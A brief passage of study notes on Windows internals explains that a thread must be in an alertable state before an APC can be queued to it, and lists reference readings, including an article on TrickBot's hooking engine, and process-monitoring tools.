In order for a userland/user-mode application to queue an APC function the thread must be in an “alertable state”. An alertable state requires the thread to be waiting for a callback such as WaitForSingleObject or Sleep.
## Resources
### Reads
- [windows.h - Wikipedia](https://en.wikipedia.org/wiki/Windows.h)
- [Working with Strings - Microsoft Documentation](https://docs.microsoft.com/en-us/windows/win32/learnwin32/working-with-strings)
- [How TrickBot Malware Hooking Engine Targets Windows 10 Browsers](https://www.sentinelone.com/labs/how-trickbot-malware-hooking-engine-targets-windows-10-browsers/)
### Tools
- [Process Hacker 2](https://github.com/processhacker/processhacker)
- [Process Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer)
- [Procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)